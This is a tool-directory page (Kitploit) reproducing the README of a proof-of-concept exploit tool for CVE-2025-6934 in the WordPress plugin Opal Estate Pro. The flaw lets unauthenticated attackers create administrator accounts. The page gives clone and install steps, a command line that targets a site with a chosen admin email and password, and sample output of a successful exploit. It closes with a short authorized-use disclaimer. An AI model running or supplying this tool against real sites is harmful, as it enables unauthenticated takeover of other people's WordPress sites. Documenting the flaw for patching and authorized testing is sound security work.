Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-6934-PoC — CVE-2025-6934 Exploit Tool Unauthenticated Administrator Account Creation in WordPress Plugin Opal Estate Pro | Kitploit
Tools/GitHubGitHub/mejbankadir/cve-2025-6934-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubmejbankadir/cve-2025-6934-poc

CVE-2025-6934-PoC

CVE-2025-6934 Exploit Tool Unauthenticated Administrator Account Creation in WordPress Plugin Opal Estate Pro

View Repository
5 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

🔓 CVE-2025-6934 Exploit Tool

Unauthenticated Administrator Account Creation in WordPress Plugin Opal Estate Pro


Python PyQt6 Status License

Created and developed fully by mejbankadir (SMH tech and Mejban HackSheild Under NexoAmicus)


📋 Description

CVE-2025-6934 is a critical vulnerability in the WordPress Opal Estate Pro plugin (versions <= 1.7.5) that allows unauthenticated attackers to create administrator accounts on vulnerable WordPress sites.

This tool provides both CLI (Command Line) and GUI (Graphical User Interface) versions for exploiting this vulnerability.


⚠️ Vulnerability Details


🛠️ Installation

Prerequisites

root@kitploit:~
# Clone the repository
git clone https://github.com/mejbankadir/CVE-2025-6934.git
cd CVE-2025-6934

# Install dependencies
pip install -r requirements.txt

Requirements

root@kitploit:~
requests
beautifulsoup4
colorama
PyQt6        # For GUI version only

🚀 Usage

GUI Version (Recommended)

root@kitploit:~
python3 CVE-2025-6934-GUI.py

GUI Features:

  • Modern dark-themed interface
  • Real-time exploit progress
  • Colored console output
  • Input validation
  • Non-blocking execution

CLI Version

root@kitploit:~
python3 CVE-2025-6934.py -u http://target.com -mail [email protected] -password P@ssw0rd123

Arguments:

root@kitploit:~
-u, --url        Target URL (required)
-mail, --newmail Email for admin account (required)
-password, --newpassword Password for admin account (required)
-user, --username Username for admin account (default: administrator)

📖 Example

root@kitploit:~
┌─────────────────────────────────────────────────────────────┐
│  _____________   _______________                            │
│  \_   ___ \   \ /   /\_   _____/                           │
│  /    \  \/\   Y   /  |    __)_   ______                   │
│  \     \____\     /   |        \ /_____/                   │
│   \______  / \___/   /_______  /                           │
│           \/                  \/                           │
│                                                             │
│          CVE-2025-6934 Exploit PoC                         │
│                                                             │
│  Created and developed fully by mejbankadir                │
│  (SMH tech and Mejban HackSheild Under NexoAmicus)        │
└─────────────────────────────────────────────────────────────┘

CLI Example

root@kitploit:~
$ python3 CVE-2025-6934.py -u http://example.com -mail [email protected] -password MyP@ss123

[•] Starting Exploit Attempt...
[•] Nonce Found: a1b2c3d4e5f6...
[✔] Exploit Successful!
    Username : administrator
    Email    : [email protected]
    Password : MyP@ss123
    Role     : administrator

🎨 Features

CLI Version

  • ✅ Banner with ASCII art
  • ✅ Colorized output (using colorama)
  • ✅ Version checking
  • ✅ Nonce extraction
  • ✅ JSON response handling

GUI Version

  • ✅ Modern dark theme UI
  • ✅ Real-time console output
  • ✅ Input validation
  • ✅ Background thread execution
  • ✅ Status bar
  • ✅ Responsive design

🔒 Security Notice

⚠️ WARNING: This tool is provided for educational and authorized security testing purposes only.

Unauthorized access to computer systems is illegal and unethical.

By using this tool, you agree to:

  • Only test systems you own or have explicit permission to test
  • Not use this tool for malicious purposes
  • Accept all responsibility for any legal consequences

📝 Credits

RoleName
Creator & Developermejbankadir
OrganizationSMH tech & Mejban HackSheild Under NexoAmicus

📂 Project Structure

root@kitploit:~
CVE-2025-6934/
├── CVE-2025-6934.py       # CLI version
├── CVE-2025-6934-GUI.py   # GUI version
├── CVE-2025-6934.yaml     # Documentation
├── requirements.txt       # Python dependencies
└── README.md             # This file

🐛 Troubleshooting

SSL Certificate Errors

The tool automatically disables SSL warnings. If you encounter issues:

root@kitploit:~
requests.packages.urllib3.disable_warnings()

Nonce Extraction Failures

  • Ensure the target URL is correct
  • Check if Opal Estate Pro plugin is installed
  • Verify the site is running WordPress

📜 License

MIT License

Copyright (c) 2025 mejbankadir (SMH tech and Mejban HackSheild Under NexoAmicus)


Made with ❤️ by mejbankadir

SMH tech | Mejban HackSheild | Under NexoAmicus

Download Tool
AttributeValue
CVE IDCVE-2025-6934
SeverityCritical (CVSS 3.1: 9.8)
Affected PluginOpal Estate Pro
Affected Versions<= 1.7.5
Vulnerability TypeUnauthenticated Administrator Account Creation
CVSS VectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H